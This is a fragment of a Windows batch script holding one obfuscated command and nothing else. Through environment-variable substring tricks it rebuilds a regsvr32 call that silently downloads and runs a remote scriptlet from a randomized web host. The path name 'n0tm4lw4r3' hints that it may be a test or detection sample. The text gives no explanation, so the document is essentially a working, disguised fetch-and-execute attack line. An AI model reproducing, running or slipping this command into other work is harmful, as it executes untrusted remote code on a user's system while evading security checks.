 F
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://lyXxCkiPGUHdbZEQqYBJSvK%ALLUSERSPROFILE:~4,1%ILpMzaVtDOfWAcjhsuwTeF%ALLUSERSPROFILE:~4,1%gnNom.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3  F
